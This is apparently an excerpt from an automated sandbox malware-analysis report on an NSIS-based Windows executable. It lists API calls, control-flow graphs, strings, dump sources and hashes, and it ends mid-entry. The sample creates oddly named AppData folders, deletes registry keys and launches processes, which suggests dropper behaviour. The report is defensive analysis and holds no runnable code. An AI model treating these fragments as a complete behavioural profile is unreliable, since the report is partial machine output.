                                        • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                        • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                        • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 770 405683-4056ce CreateDirectoryW 771 4056d0-4056d2 770->771 772 4056d4-4056e1 GetLastError 770->772 773 4056fb-4056fd 771->773 772->773 774 4056e3-4056f7 SetFileSecurityW 772->774 774->771 775 4056f9 GetLastError 774->775 775->773
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                        • GetLastError.KERNEL32 ref: 004056DA
                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                        • GetLastError.KERNEL32 ref: 004056F9
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 3449924974-4083868402
                                        • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                        • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                        • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                        • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 776 402bff-402c28 RegOpenKeyExW 777 402c93-402c97 776->777 778 402c2a-402c35 776->778 779 402c50-402c60 RegEnumKeyW 778->779 780 402c62-402c74 RegCloseKey call 40642b 779->780 781 402c37-402c3a 779->781 788 402c76-402c85 780->788 789 402c9a-402ca0 780->789 783 402c87-402c8a RegCloseKey 781->783 784 402c3c-402c4e call 402bff 781->784 786 402c90-402c92 783->786 784->779 784->780 786->777 788->777 789->786 791 402ca2-402cb0 RegDeleteKeyW 789->791 791->786 793 402cb2 791->793 793->777
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                        • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                        • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
                                        • Opcode ID: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
                                        • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                        • Opcode Fuzzy Hash: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
                                        • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 794 10001759-10001795 call 10001b18 798 100018a6-100018a8 794->798 799 1000179b-1000179f 794->799 800 100017a1-100017a7 call 10002286 799->800 801 100017a8-100017b5 call 100022d0 799->801 800->801 806 100017e5-100017ec 801->806 807 100017b7-100017bc 801->807 808 1000180c-10001810 806->808 809 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 806->809 810 100017d7-100017da 807->810 811 100017be-100017bf 807->811 815 10001812-1000184c call 100015b4 call 100024a9 808->815 816 1000184e-10001854 call 100024a9 808->816 831 10001855-10001859 809->831 810->806 817 100017dc-100017dd call 10002b5f 810->817 813 100017c1-100017c2 811->813 814 100017c7-100017c8 call 100028a4 811->814 819 100017c4-100017c5 813->819 820 100017cf-100017d5 call 10002645 813->820 826 100017cd 814->826 815->831 816->831 829 100017e2 817->829 819->806 819->814 835 100017e4 820->835 826->829 829->835 836 10001896-1000189d 831->836 837 1000185b-10001869 call 1000246c 831->837 835->806 836->798 842 1000189f-100018a0 GlobalFree 836->842 844 10001881-10001888 837->844 845 1000186b-1000186e 837->845 842->798 844->836 847 1000188a-10001895 call 1000153d 844->847 845->844 846 10001870-10001878 845->846 846->844 848 1000187a-1000187b FreeLibrary 846->848 847->836 848->844
                                        APIs
                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                        • GlobalFree.KERNEL32(00000000), ref: 10001804
                                        • FreeLibrary.KERNEL32(?), ref: 1000187B
                                        • GlobalFree.KERNELBASE(00000000), ref: 100018A0
                                          • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                          • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                          • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                        • String ID:
                                        • API String ID: 1791698881-3916222277
                                        • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                        • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                        • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                        • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                        APIs
                                          • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                          • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 00405AC2
                                          • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                          • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                        • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 00405B6A
                                        • GetFileAttributesW.KERNELBASE(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: 4Wu$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 3248276644-3057243036
                                        • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                        • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                        • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                        • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                        • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Call
                                        • API String ID: 3677997916-1824292864
                                        • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                        • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                        • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                        • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405C77
                                        • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-1331003597
                                        • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                        • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                        • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                        • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                        • wsprintfW.USER32 ref: 00406411
                                        • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll
                                        • API String ID: 2200240437-2744773210
                                        • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                        • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                        • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                        • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                        APIs
                                          • Part of subcall function 004051B4: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                          • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                          • Part of subcall function 004051B4: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,0040318B,0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0), ref: 0040520F
                                          • Part of subcall function 004051B4: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll), ref: 00405221
                                          • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                          • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                          • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                          • Part of subcall function 00405735: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                          • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 3585118688-0
                                        • Opcode ID: 1a98362bca4db66e1e19a0324b651a5f38e2de0179efdcb995dc5396ff982919
                                        • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                        • Opcode Fuzzy Hash: 1a98362bca4db66e1e19a0324b651a5f38e2de0179efdcb995dc5396ff982919
                                        • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                        APIs
                                          • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 00405AC2
                                          • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                          • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                          • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes,?,00000000,000000F0), ref: 00401645
                                        Strings
                                        • C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes, xrefs: 00401638
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes
                                        • API String ID: 1892508949-2994632085
                                        • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                        • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                        • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                        • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                        APIs
                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                        • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                        Strings
                                        • Error launching installer, xrefs: 00405748
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                        • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                        • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                        • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                          • Part of subcall function 004051B4: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                          • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                          • Part of subcall function 004051B4: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,0040318B,0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0), ref: 0040520F
                                          • Part of subcall function 004051B4: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll), ref: 00405221
                                          • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                          • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                          • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                        • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
